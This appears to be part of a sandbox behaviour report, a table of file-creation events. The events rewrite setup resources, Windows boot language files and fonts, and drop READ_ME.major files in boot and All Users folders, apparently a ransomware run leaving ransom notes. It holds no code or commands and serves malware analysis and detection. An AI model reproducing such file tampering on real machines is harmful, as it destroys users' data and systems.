| Create | \588bce7c90097ed212\1028\eula.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \588bce7c90097ed212\1029\SetupResources.dll | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \588bce7c90097ed212\1029\LocalizedData.xml | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \588bce7c90097ed212\1029\eula.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \588bce7c90097ed212\1030\SetupResources.dll | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \588bce7c90097ed212\1030\LocalizedData.xml | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \588bce7c90097ed212\1030\eula.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \588bce7c90097ed212\1031\SetupResources.dll | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \588bce7c90097ed212\1031\LocalizedData.xml | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \588bce7c90097ed212\1031\eula.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \588bce7c90097ed212\1032\SetupResources.dll | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \588bce7c90097ed212\1032\LocalizedData.xml | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \588bce7c90097ed212\1032\eula.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \588bce7c90097ed212\1033\SetupResources.dll | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \588bce7c90097ed212\1033\LocalizedData.xml | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \588bce7c90097ed212\1033\eula.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \588bce7c90097ed212\1035\SetupResources.dll | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \588bce7c90097ed212\1035\LocalizedData.xml | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \588bce7c90097ed212\1035\eula.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \588bce7c90097ed212\1036\SetupResources.dll | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \588bce7c90097ed212\1036\LocalizedData.xml | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \588bce7c90097ed212\1036\eula.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \588bce7c90097ed212\1037\SetupResources.dll | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \588bce7c90097ed212\1037\LocalizedData.xml | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \588bce7c90097ed212\1037\eula.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \588bce7c90097ed212\1038\SetupResources.dll | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \588bce7c90097ed212\1038\LocalizedData.xml | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \588bce7c90097ed212\1038\eula.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \588bce7c90097ed212\1040\SetupResources.dll | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \588bce7c90097ed212\1040\LocalizedData.xml | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \588bce7c90097ed212\1040\eula.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \588bce7c90097ed212\1041\SetupResources.dll | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \588bce7c90097ed212\1041\LocalizedData.xml | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \588bce7c90097ed212\1041\eula.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \588bce7c90097ed212\1042\SetupResources.dll | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \588bce7c90097ed212\1042\LocalizedData.xml | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \588bce7c90097ed212\1042\eula.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \588bce7c90097ed212\1043\SetupResources.dll | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \588bce7c90097ed212\1043\LocalizedData.xml | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \588bce7c90097ed212\1043\eula.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \588bce7c90097ed212\1044\SetupResources.dll | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \588bce7c90097ed212\1044\LocalizedData.xml | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \588bce7c90097ed212\1044\eula.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \588bce7c90097ed212\1045\SetupResources.dll | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \588bce7c90097ed212\1045\LocalizedData.xml | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \588bce7c90097ed212\1045\eula.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \588bce7c90097ed212\1046\SetupResources.dll | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \588bce7c90097ed212\1046\LocalizedData.xml | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \588bce7c90097ed212\1046\eula.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \588bce7c90097ed212\1049\SetupResources.dll | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \588bce7c90097ed212\1049\LocalizedData.xml | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \588bce7c90097ed212\1049\eula.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \588bce7c90097ed212\1053\SetupResources.dll | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \588bce7c90097ed212\1053\LocalizedData.xml | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \588bce7c90097ed212\1053\eula.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \588bce7c90097ed212\1055\SetupResources.dll | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \588bce7c90097ed212\1055\LocalizedData.xml | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \588bce7c90097ed212\1055\eula.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \588bce7c90097ed212\2052\SetupResources.dll | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \588bce7c90097ed212\2052\LocalizedData.xml | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \588bce7c90097ed212\2052\eula.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \588bce7c90097ed212\2070\SetupResources.dll | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \588bce7c90097ed212\2070\LocalizedData.xml | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \588bce7c90097ed212\2070\eula.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \588bce7c90097ed212\3076\SetupResources.dll | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \588bce7c90097ed212\3076\LocalizedData.xml | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \588bce7c90097ed212\3076\eula.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \588bce7c90097ed212\3082\SetupResources.dll | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \588bce7c90097ed212\3082\LocalizedData.xml | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \588bce7c90097ed212\3082\eula.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \588bce7c90097ed212\Client\UiInfo.xml | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \588bce7c90097ed212\Client\Parameterinfo.xml | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \588bce7c90097ed212\Extended\UiInfo.xml | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \588bce7c90097ed212\Extended\Parameterinfo.xml | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \588bce7c90097ed212\Graphics\warn.ico | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \588bce7c90097ed212\Graphics\SysReqNotMet.ico | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \588bce7c90097ed212\Graphics\SysReqMet.ico | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \588bce7c90097ed212\Graphics\stop.ico | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \588bce7c90097ed212\Graphics\Setup.ico | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \588bce7c90097ed212\Graphics\Save.ico | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \588bce7c90097ed212\Graphics\Rotate8.ico | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \588bce7c90097ed212\Graphics\Rotate7.ico | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \588bce7c90097ed212\Graphics\Rotate6.ico | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \588bce7c90097ed212\Graphics\Rotate5.ico | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \588bce7c90097ed212\Graphics\Rotate4.ico | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \588bce7c90097ed212\Graphics\Rotate3.ico | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \588bce7c90097ed212\Graphics\Rotate2.ico | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \588bce7c90097ed212\Graphics\Rotate1.ico | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \588bce7c90097ed212\Graphics\Print.ico | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Boot\bg-BG\bootmgr.exe.mui | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Boot\cs-CZ\memtest.exe.mui | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Boot\cs-CZ\bootmgr.exe.mui | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Boot\da-DK\memtest.exe.mui | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Boot\da-DK\bootmgr.exe.mui | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Boot\de-DE\memtest.exe.mui | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Boot\de-DE\bootmgr.exe.mui | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Boot\el-GR\memtest.exe.mui | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Boot\el-GR\bootmgr.exe.mui | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Boot\en-GB\bootmgr.exe.mui | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Boot\en-US\memtest.exe.mui | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Boot\en-US\bootmgr.exe.mui | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Boot\es-ES\memtest.exe.mui | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Boot\es-ES\bootmgr.exe.mui | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Boot\es-MX\bootmgr.exe.mui | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Boot\et-EE\bootmgr.exe.mui | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Boot\fi-FI\memtest.exe.mui | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Boot\fi-FI\bootmgr.exe.mui | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Boot\Fonts\wgl4_boot.ttf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Boot\Fonts\segoe_slboot.ttf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Boot\Fonts\segoen_slboot.ttf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Boot\Fonts\segmono_boot.ttf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Boot\Fonts\msyh_boot.ttf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Boot\Fonts\msyhn_boot.ttf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Boot\Fonts\msjh_boot.ttf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Boot\Fonts\msjhn_boot.ttf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Boot\Fonts\meiryo_boot.ttf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Boot\Fonts\meiryon_boot.ttf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Boot\Fonts\malgun_boot.ttf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Boot\Fonts\malgunn_boot.ttf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Boot\Fonts\kor_boot.ttf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Boot\Fonts\jpn_boot.ttf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Boot\Fonts\cht_boot.ttf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Boot\Fonts\chs_boot.ttf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Boot\fr-CA\bootmgr.exe.mui | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Boot\fr-FR\memtest.exe.mui | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Boot\fr-FR\bootmgr.exe.mui | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Boot\hr-HR\bootmgr.exe.mui | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Boot\hu-HU\memtest.exe.mui | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Boot\hu-HU\bootmgr.exe.mui | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Boot\it-IT\memtest.exe.mui | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Boot\it-IT\bootmgr.exe.mui | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Boot\ja-JP\memtest.exe.mui | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Boot\ja-JP\bootmgr.exe.mui | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Boot\ko-KR\memtest.exe.mui | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Boot\ko-KR\bootmgr.exe.mui | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Boot\lt-LT\bootmgr.exe.mui | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Boot\lv-LV\bootmgr.exe.mui | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Boot\nb-NO\memtest.exe.mui | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Boot\nb-NO\bootmgr.exe.mui | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Boot\nl-NL\memtest.exe.mui | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Boot\nl-NL\bootmgr.exe.mui | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Boot\pl-PL\memtest.exe.mui | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Boot\pl-PL\bootmgr.exe.mui | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Boot\pt-BR\memtest.exe.mui | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Boot\pt-BR\bootmgr.exe.mui | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Boot\pt-PT\memtest.exe.mui | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Boot\pt-PT\bootmgr.exe.mui | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Boot\qps-ploc\memtest.exe.mui | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Boot\qps-ploc\bootmgr.exe.mui | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Boot\Resources\en-US\READ_ME.major | desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Boot\Resources\bootres.dll | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Boot\ro-RO\bootmgr.exe.mui | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Boot\ru-RU\memtest.exe.mui | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Boot\ru-RU\bootmgr.exe.mui | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Boot\sk-SK\bootmgr.exe.mui | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Boot\sl-SI\bootmgr.exe.mui | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Boot\sr-Latn-CS\memtest.exe.mui | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Boot\sr-Latn-CS\bootmgr.exe.mui | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Boot\sr-Latn-RS\bootmgr.exe.mui | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Boot\sv-SE\memtest.exe.mui | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Boot\sv-SE\bootmgr.exe.mui | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Boot\tr-TR\memtest.exe.mui | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Boot\tr-TR\bootmgr.exe.mui | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Boot\uk-UA\bootmgr.exe.mui | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Boot\zh-CN\memtest.exe.mui | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Boot\zh-CN\bootmgr.exe.mui | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Boot\zh-HK\memtest.exe.mui | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Boot\zh-HK\bootmgr.exe.mui | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Boot\zh-TW\memtest.exe.mui | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Boot\zh-TW\bootmgr.exe.mui | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Users\All Users\Adobe\READ_ME.major | desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Users\All Users\Application Data\READ_ME.major | desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Users\All Users\Comms\READ_ME.major | desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Users\All Users\Desktop\READ_ME.major | desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Users\All Users\Documents\READ_ME.major | desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
